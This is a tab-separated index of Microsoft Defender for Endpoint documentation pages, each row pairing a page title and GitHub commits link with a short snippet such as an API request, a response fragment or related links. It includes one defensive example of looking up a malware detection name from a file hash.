security	Export Security Baseline Assessment	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/export-security-baseline-assessment.md	GET https://api.securitycenter.microsoft.com/api/machines/BaselineComplianceAsse - [Get security baselines assessment profiles](get-security-baselines-assessment-profiles.md) - [Get security baselines assessment configurations](get-security-baselines-assessment-configurations.md)
security	Exposed Apis Create App Nativeapp	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/exposed-apis-create-app-nativeapp.md	Verify to make sure you got a correct token: - [Microsoft Defender for Endpoint APIs](exposed-apis-list.md) - [Access Microsoft Defender for Endpoint with application context](exposed-apis-create-app-webapp.md)
security	Exposed Apis Create App Partners	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/exposed-apis-create-app-partners.md	Sanity check to make sure you got a correct token: - [Supported Microsoft Defender for Endpoint APIs](exposed-apis-list.md) - [Access Microsoft Defender for Endpoint on behalf of a user](exposed-apis-create-app-nativeapp.md)
security	Exposed Apis Create App Webapp	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/exposed-apis-create-app-webapp.md	var response = httpClient.SendAsync(request).GetAwaiter().GetResult(); ## See also - [Supported Microsoft Defender for Endpoint APIs](exposed-apis-list.md) - [Access Microsoft Defender for Endpoint on behalf of a user](exposed-apis-create-app-nativeapp.md)
security	Exposed Apis Full Sample Powershell	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/exposed-apis-full-sample-powershell.md	$response - [Microsoft Defender for Endpoint APIs](apis-intro.md) - [Advanced Hunting API](run-advanced-query-api.md) - [Advanced Hunting using Python](run-advanced-query-sample-python.md)
security	Exposed Apis List	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/exposed-apis-list.md	Topic \| Description - [Microsoft Defender for Endpoint APIs](apis-intro.md) - [Microsoft Defender for Endpoint API release notes](api-release-notes.md)
security	Exposed Apis Odata Samples	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/exposed-apis-odata-samples.md	json{ ## See also [Microsoft Defender for Endpoint APIs](apis-intro.md)
security	Feedback Loop Blocking	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/feedback-loop-blocking.md	If your organization is using Defender for Endpoint, feedback-loop blocking is e - [(Blog) Behavioral blocking and containment: Transforming optics into protection](https://www.microsoft.com/security/blog/2020/03/09/behavioral-blocking-and-containment-transforming-optics-into-protection/) - [Helpful Microsoft Defender for Endpoint resources](/microsoft-365/security/defender-endpoint/helpful-resources)
security	Fetch Alerts Mssp	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/fetch-alerts-mssp.md	For information on how to fetch alerts using REST API, see [Fetch alerts from MS - [Grant MSSP access to the portal](grant-mssp-access.md) - [Access the MSSP customer portal](access-mssp-portal.md) - [Configure alert notifications](configure-mssp-notifications.md)
security	Files	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/files.md	Method\|Return Type \|Description "determinationValue": "PUA:Win32/FusionCore" } ```
security	Find Defender Malware Name	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/find-defender-malware-name.md	To find the detection name of a malware family, you'll need to search the intern For example, search for the "Sunburst cyberattack hash". One of the websites returned in the search results should have the hash. In this example, the hash is a25cadd48d70f6ea0c4a241d99c5241269e6faccb4054e62d16784640f8e53bc. Then, look up this hash in [Virus Total](https://www.virustotal.com/). You'll find the Microsoft row detects this malware as Trojan:MSIL/Solorigate.BR!dha. Searching in the Microsoft Defender Security Intelligence website, you'll find information specific to that malware, including technical details and mitigation steps.
security	Find Machine Info By Ip	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/find-machine-info-by-ip.md	Content-type: application/json ... } ```
security	Find Machines By Ip	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/find-machines-by-ip.md	Here's an example of the request. ```http GET https://api.securitycenter.microsoft.com/api/machines/findbyip(ip='10.248.240.38',timestamp=2019-09-22T08:44:05Z) ```
security	Find Machines By Tag	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/find-machines-by-tag.md	Here's an example of the request. ```http GET https://api.securitycenter.microsoft.com/api/machines/findbytag?tag=testTag&useStartsWithFilter=true ```
security	Fix Unhealthy Sensors	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/fix-unhealthy-sensors.md	If you took corrective actions and the device status is still misconfigured, [op - [Run the client analyzer on macOS or Linux](run-analyzer-macos-linux.md) - [Data collection for advanced troubleshooting on Windows](data-collection-analyzer.md)
security	Get Alert Info By Id	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-alert-info-by-id.md	Empty ## Response If successful, this method returns 200 OK, and the [alert](alerts.md) entity in the response body. If an alert with the specified ID wasn't found - 404 Not Found.
security	Get Alert Related Domain Info	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-alert-related-domain-info.md	Here's an example of the response. ] } ```
security	Get Alert Related Files Info	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-alert-related-files-info.md	Here is an example of the response. ] } ```
security	Get Alert Related Ip Info	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-alert-related-ip-info.md	Here's an example of the response. ] } ```
security	Get Alert Related Machine Info	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-alert-related-machine-info.md	Here is an example of the response. ] } ```
security	Get Alert Related User Info	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-alert-related-user-info.md	Here is an example of the response. "isOnlyNetworkUser": false } ```
security	Get Alerts	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-alerts.md	Here is an example of the response. ## See also [OData queries with Microsoft Defender for Endpoint](exposed-apis-odata-samples.md)
security	Get All Recommendations	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-all-recommendations.md	Here is an example of the response. - [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt) - [Vulnerability management security recommendations](/microsoft-365/security/defender-endpoint/tvm-security-recommendation)
security	Get All Scan Agents	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-all-scan-agents.md	Here is an example of the response. ] } ```
security	Get All Scan Definitions	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-all-scan-definitions.md	Here is an example of the response. ] } ```
security	Get All Vulnerabilities By Machines	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-all-vulnerabilities-by-machines.md	Here is an example of the response. - [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt) - [Vulnerabilities in your organization](/microsoft-365/security/defender-endpoint/tvm-weaknesses)
security	Get All Vulnerabilities	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-all-vulnerabilities.md	Here is an example of the response. - [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt) - [Vulnerabilities in your organization](/microsoft-365/security/defender-endpoint/tvm-weaknesses)
security	Get Assessment Browser Extensions	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-assessment-browser-extensions.md	GET https://api.securitycenter.microsoft.com/api/machines/browserextensionsinven - [Vulnerability management](../defender-vulnerability-management/defender-vulnerability-management.md) - [Vulnerabilities in your organization](../defender-vulnerability-management/tvm-weaknesses.md)
security	Get Assessment Information Gathering	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-assessment-information-gathering.md	GET https://api.securitycenter.microsoft.com/api/machines/InfoGatheringExport?$s - [DeviceTvmInfoGatheringKB](../defender/advanced-hunting-devicetvminfogatheringkb-table.md) - [Vulnerability management](../defender-vulnerability-management/defender-vulnerability-management.md) - [Vulnerabilities in your organization](../defender-vulnerability-management/tvm-weaknesses.md)
security	Get Assessment Methods Properties	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-assessment-methods-properties.md	Other related - [Microsoft Defender Vulnerability Management](next-gen-threat-and-vuln-mgt.md) - [Vulnerabilities in your organization](tvm-weaknesses.md)
security	Get Assessment Non Cpe Software Inventory	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-assessment-non-cpe-software-inventory.md	GET https://api.securitycenter.microsoft.com/api/machines/SoftwareInventoryNonCp Other related - [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt) - [Vulnerabilities in your organization](tvm-weaknesses.md)
security	Get Assessment Secure Config	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-assessment-secure-config.md	Other related - [Microsoft Defender Vulnerability Management](next-gen-threat-and-vuln-mgt.md) - [Vulnerabilities in your organization](tvm-weaknesses.md)
security	Get Assessment Software Inventory	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-assessment-software-inventory.md	Other related - [Microsoft Defender Vulnerability Management](next-gen-threat-and-vuln-mgt.md) - [Vulnerabilities in your organization](tvm-weaknesses.md)
security	Get Assessment Software Vulnerabilities	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-assessment-software-vulnerabilities.md	Other related - [Microsoft Defender Vulnerability Management](next-gen-threat-and-vuln-mgt.md) - [Vulnerabilities in your organization](tvm-weaknesses.md)
security	Get Authenticated Scan Properties	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-authenticated-scan-properties.md	AuthProtocol\|String (Optional)\|Auth protocol to use with "SnmpAuthParams" and "A AuthPassword\|String (Optional)\|Auth password to use with "SnmpAuthParams" and "AuthNoPriv" or "AuthPriv". PrivProtocol\|String (Optional)\|Priv protocol to use with "SnmpAuthParams" and "AuthPriv". Possible values are "DES", "3DES", "AES". PrivPassword\|String (Optional)\|Priv password to use with "SnmpAuthParams" and "AuthPriv".
security	Get Browser Extensions Permission Info	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-browser-extensions-permission-info.md	Here is an example of the response. ## Other related - [Vulnerability management](../defender-vulnerability-management/defender-vulnerability-management.md)-- [Vulnerabilities in your organization](../defender-vulnerability-management/tvm-weaknesses.md) +- [Vulnerabilities in your organization](../defender-vulnerability-management/tvm-weaknesses.md)
security	Get Device Secure Score	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-device-secure-score.md	Here is an example of the response. ## See also - [OData queries with Microsoft Defender for Endpoint](exposed-apis-odata-samples.md)
security	Get Discovered Vulnerabilities	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-discovered-vulnerabilities.md	Here is an example of the response. - [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt) - [Vulnerabilities in your organization](/microsoft-365/security/defender-endpoint/tvm-weaknesses)
security	Get Domain Related Alerts	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-domain-related-alerts.md	Here's an example of the request. ```http GET https://api.securitycenter.microsoft.com/api/domains/client.wns.windows.com/alerts ```
security	Get Domain Related Machines	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-domain-related-machines.md	Here's an example of the request. ```http GET https://api.securitycenter.microsoft.com/api/domains/api.securitycenter.microsoft.com/machines ```
security	Get Domain Statistics	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-domain-statistics.md	Here's an example of the response. "orgLastSeen": "2017-08-29T13:09:05Z" } ```
security	Get Exposure Score	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-exposure-score.md	Here is an example of the response. - [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt) - [Defender Vulnerability Management exposure score](/microsoft-365/security/defender-endpoint/tvm-exposure-score)
security	Get File Information	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-file-information.md	Here's an example of the response. "determinationValue": "PUA:Win32/FusionCore" } ```
security	Get File Related Alerts	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-file-related-alerts.md	Here's an example of the request. ```http GET https://api.securitycenter.microsoft.com/api/files/6532ec91d513acc05f43ee0aa3002599729fd3e1/alerts ```
security	Get File Related Machines	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-file-related-machines.md	Here's an example of the request. ```http GET https://api.securitycenter.microsoft.com/api/files/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/machines ```
security	Get File Statistics	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-file-statistics.md	Here's an example of the response. ] } ```
security	Get Installed Software	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-installed-software.md	Here is an example of the response. - [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt) - [Defender Vulnerability Management software inventory](/microsoft-365/security/defender-endpoint/tvm-software-inventory)
security	Get Investigation Collection	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-investigation-collection.md	Here is an example of the response: ] } ```
security	Get Investigation Object	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-investigation-object.md	Empty If successful, this method returns 200, Ok response code with a [Investigations](investigation.md) entity.
security	Get Ip Related Alerts	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-ip-related-alerts.md	Here is an example of the request. ```http GET https://api.securitycenter.microsoft.com/api/ips/10.209.67.177/alerts ```
security	Get Ip Statistics	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-ip-statistics.md	Here's an example of the response. > [!NOTE] > This statistic information is based on data from the past 30 days.
security	Get Live Response Result	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-live-response-result.md	C:\\windows\\TEMP\\OfficeClickToRun.dmp.zip\n51 MB\n\u0000\u0000\u0000", - [Get machine action API](get-machineaction-object.md) - [Cancel machine action](cancel-machine-action.md) - [Run live response](run-live-response.md)
security	Get Machine By Id	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-machine-by-id.md	Content-type: application/json "machineTags": [ "test tag 1", "test tag 2" ] } ```
security	Get Machine Group Exposure Score	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-machine-group-exposure-score.md	Here is an example of the response. - [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt) - [Defender Vulnerability Management exposure score](/microsoft-365/security/defender-endpoint/tvm-exposure-score)
security	Get Machine Log On Users	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-machine-log-on-users.md	Content-type: application/json ] } ```
security	Get Machine Related Alerts	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-machine-related-alerts.md	Empty ## Response If successful and device exists: 200 OK with list of [alert](alerts.md) entities in the body. If device was not found: 404 Not Found.
security	Get Machineaction Object	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-machineaction-object.md	Content-type: application/json "relatedFileInfo": null } ```
security	Get Machineactions Collection	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-machineactions-collection.md	Content-type: application/json ## Related topics - [OData queries with Microsoft Defender for Endpoint](exposed-apis-odata-samples.md)
security	Get Machines By Software	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-machines-by-software.md	Here is an example of the response. - [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt) - [Defender Vulnerability Management software inventory](/microsoft-365/security/defender-endpoint/tvm-software-inventory)
security	Get Machines By Vulnerability	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-machines-by-vulnerability.md	Here is an example of the response. - [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt) - [Vulnerabilities in your organization](/microsoft-365/security/defender-endpoint/tvm-weaknesses)
security	Get Machines	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-machines.md	Content-type: application/json ## Related articles - [OData queries with Microsoft Defender for Endpoint](exposed-apis-odata-samples.md)
security	Get Missing Kbs Machine	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-missing-kbs-machine.md	Here is an example of the response. - [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt) - [Defender Vulnerability Management software inventory](/microsoft-365/security/defender-endpoint/tvm-software-inventory)
security	Get Missing Kbs Software	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-missing-kbs-software.md	Here is an example of the response. - [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt) - [Defender Vulnerability Management software inventory](/microsoft-365/security/defender-endpoint/tvm-software-inventory)
security	Get Package Sas Uri	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-package-sas-uri.md	Content-type: application/json "value": "\"https://userrequests-us.securitycenter.windows.com:443/safedownload/WDATP_Investigation_Package.zip?token=gbDyj7y%2fbWGAZjn2sFiZXlliBTXOCVG7yiJ6mXNaQ9pLByC2Wxeno9mENsPFP3xMk5l%2bZiJXjLvqAyNEzUNROxoM2I1er9dxzfVeBsxSmclJjPsAx%2btiNyxSz1Ax%2b5jaT5cL5bZg%2b8wgbwY9urXbTpGjAKh6FB1e%2b0ypcWkPm8UkfOwsmtC%2biZJ2%2bPqnkkeQk7SKMNoAvmh9%2fcqDIPKXGIBjMa0D9auzypOqd8bQXp7p2BnLSH136BxST8n9IHR4PILvRjAYW9kvtHkBpBitfydAsUW4g2oDZSPN3kCLBOoo1C4w4Lkc9Bc3GNU2IW6dfB7SHcp7G9p4BDkeJl3VuDs6esCaeBorpn9FKJ%2fXo7o9pdcI0hUPZ6Ds9hiPpwPUtz5J29CBE3QAopCK%2fsWlf6OW2WyXsrNRSnF1tVE5H3wXpREzuhD7S4AIA3OIEZKzC4jIPLeMu%2bazZU9xGwuc3gICOaokbwMJiZTqcUuK%2fV9YdBdjdg8wJ16NDU96Pl6%2fgew2KYuk6Wo7ZuHotgHI1abcsvdlpe4AvixDbqcRJthsg2PpLRaFLm5av44UGkeK6TJpFvxUn%2f9fg6Zk5yM1KUTHb8XGmutoCM8U9er6AzXZlY0gGc3D3bQOg41EJZkEZLyUEbk1hXJB36ku2%2bW01cG71t7MxMBYz7%2bdXobxpdo%3d%3bRWS%2bCeoDfTyDcfH5pkCg6hYDmCOPr%2fHYQuaUWUBNVnXURYkdyOzVHqp%2fe%2f1BNyPdVoVkpQHpz1pPS3b5g9h7IMmNKCk5gFq5m2nPx6kk9EYtzx8Ndoa2m9Yj%2bSaf8zIFke86YnfQL4AYewsnQNJJh4wc%2bXxGlBq7axDcoiOdX91rKzVicH3GSBkFoLFAKoegWWsF%2fEDZcVpF%2fXUA1K8HvB6dwyfy4y0sAqnNPxYTQ97mG7yHhxPt4Pe9YF2UPPAJVuEf8LNlQ%2bWHC9%2f7msF6UUI4%2fca%2ftpjFs%2fSNeRE8%2fyQj21TI8YTF1SowvaJuDc1ivEoeopNNGG%2bGI%2fX0SckaVxU9Hdkh0zbydSlT5SZwbSwescs0IpzECitBbaLUz4aT8KTs8T0lvx8D7Te3wVsKAJ1r3iFMQZrlk%2bS1WW8rvac7oHRx2HKURn1v7fDIQWgJr9aNsNlFz4fLJ50T2qSHuuepkLVbe93Va072aMGhvr09WVKoTpAf1j2bcFZZU6Za5PxI32mr0k90FgiYFJ1F%2f1vRDrGwvWVWUkR3Z33m4g0gHa52W1FMxQY0TJIwbovD6FaSNDx7xhKZSd5IJ7r6P91Gez49PaZRcAZPjd%2bfbul3JNm1VqQPTLohT7wa0ymRiXpSST74xtFzuEBzNSNATdbngj3%2fwV4JesTjZjIj5Dc%3d%3blumqauVlFuuO8MQffZgs0tLJ4Fq6fpeozPTdDf8Ll6XLegi079%2b4mSPFjTK0y6eohstxdoOdom2wAHiZwk0u4KLKmRkfYOdT1wHY79qKoBQ3ZDHFTys9V%2fcwKGl%2bl8IenWDutHygn5IcA1y7GTZj4g%3d%3d\"" } ```
security	Get Recommendation By Id	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-recommendation-by-id.md	Here's an example of the response. - [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt) - [Defender Vulnerability Management security recommendation](/microsoft-365/security/defender-endpoint/tvm-security-recommendation)
security	Get Recommendation Machines	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-recommendation-machines.md	Here is an example of the response. - [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt) - [Defender Vulnerability Management security recommendation](/microsoft-365/security/defender-endpoint/tvm-security-recommendation)
security	Get Recommendation Vulnerabilities	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-recommendation-vulnerabilities.md	Here is an example of the response. - [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt) - [Defender Vulnerability Management security recommendation](/microsoft-365/security/defender-endpoint/tvm-security-recommendation)
security	Get Remediation All Activities	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-remediation-all-activities.md	GET https://api.securitycenter.windows.com/api/remediationtasks/ - [List exposed devices of one remediation activity](get-remediation-exposed-devices-activities.md) - [Microsoft Defender Vulnerability Management](next-gen-threat-and-vuln-mgt.md) - [Vulnerabilities in your organization](tvm-weaknesses.md)
security	Get Remediation Exposed Devices Activities	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-remediation-exposed-devices-activities.md	GET https://api.securitycenter.windows.com/api/remediationtasks/03942ef5-aecb-4c - [List all remediation activities](get-remediation-all-activities.md) - [Microsoft Defender Vulnerability Management](next-gen-threat-and-vuln-mgt.md) - [Vulnerabilities in your organization](tvm-weaknesses.md)
security	Get Remediation Methods Properties	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-remediation-methods-properties.md	vendorId\|String\|Related vendor name - [Microsoft Defender Vulnerability Management](next-gen-threat-and-vuln-mgt.md) - [Vulnerabilities in your organization](tvm-weaknesses.md)
security	Get Remediation One Activity	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-remediation-one-activity.md	GET https://api.securitycenter.windows.com/api/remediationtasks/03942ef5-aecb-4c - [List exposed devices of one remediation activity](get-remediation-exposed-devices-activities.md) - [Microsoft Defender Vulnerability Management](next-gen-threat-and-vuln-mgt.md) - [Vulnerabilities in your organization](tvm-weaknesses.md)
security	Get Security Baselines Assessment Configurations	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-security-baselines-assessment-configurations.md	GET https://api.securitycenter.microsoft.com/api/baselineConfigurations - [Export security baselines assessment](export-security-baseline-assessment.md) - [Get security baselines assessment profiles](get-security-baselines-assessment-profiles.md)
security	Get Security Baselines Assessment Profiles	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-security-baselines-assessment-profiles.md	GET https://api.securitycenter.microsoft.com/api/baselineProfiles - [Export security baselines assessment](export-security-baseline-assessment.md) - [Get security baselines assessment configurations](get-security-baselines-assessment-configurations.md)
security	Get Security Recommendations	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-security-recommendations.md	Here is an example of the response. - [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt) - [Defender Vulnerability Management security recommendation](/microsoft-365/security/defender-endpoint/tvm-security-recommendation)
security	Get Software By Id	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-software-by-id.md	Here's an example of the response. - [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt) - [Defender Vulnerability Management software inventory](/microsoft-365/security/defender-endpoint/tvm-software-inventory)
security	Get Software Ver Distribution	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-software-ver-distribution.md	Here is an example of the response. - [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt) - [Defender Vulnerability Management software inventory](/microsoft-365/security/defender-endpoint/tvm-software-inventory)
security	Get Software	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-software.md	Here is an example of the response. - [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt) - [Defender Vulnerability Management software inventory](/microsoft-365/security/defender-endpoint/tvm-software-inventory)
security	Get Started Partner Integration	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-started-partner-integration.md	Managed security service providers (MSSP) and independent software vendors (ISV) ## Related topics - [Technical partner opportunities](partner-integration.md)
security	Get Ti Indicators Collection	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-ti-indicators-collection.md	Content-type: application/json ] } ```
security	Get User Related Alerts	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-user-related-alerts.md	Here is an example of the request. ```http GET https://api.securitycenter.microsoft.com/api/users/user1/alerts ```
security	Get User Related Machines	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-user-related-machines.md	Here is an example of the request. ```http GET https://api.securitycenter.microsoft.com/api/users/user1/machines ```
security	Get Vuln By Software	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-vuln-by-software.md	Here is an example of the response. ] } ```
security	Get Vulnerability By Id	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/get-vulnerability-by-id.md	Here is an example of the response. - [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt) - [Vulnerabilities in your organization](/microsoft-365/security/defender-endpoint/tvm-weaknesses)
security	Gov	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/gov.md	These are the features and known gaps for [Mobile Threat Defense (Microsoft Defe \|Microsoft Defender Vulnerability Management (MDVM))\|![Yes](images/svg/check-yes.svg)\|![Yes](images/svg/check-yes.svg)\|![Yes](images/svg/check-yes.svg)\|
security	Grant Mssp Access	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/grant-mssp-access.md	To implement a multi-tenant delegated access solution, take the following steps: - [Access the MSSP customer portal](access-mssp-portal.md) - [Configure alert notifications](configure-mssp-notifications.md) - [Fetch alerts from customer tenant](fetch-alerts-mssp.md)
security	Health Status	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/health-status.md	edr_preferred_geo : "unitedstates" ``` You can run `mdatp health --help` on recent versions to list all supported `feature`s.
security	Helpful Resources	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/helpful-resources.md	Access helpful resources such as links to blogs and other resources related to - [How automation brings value to your security teams](https://techcommunity.microsoft.com/t5/Microsoft-Defender-ATP/How-automation-brings-value-to-your-security-teams/ba-p/729297) - [Address false positives/negatives in Microsoft Defender for Endpoint](defender-endpoint-false-positives-negatives.md)
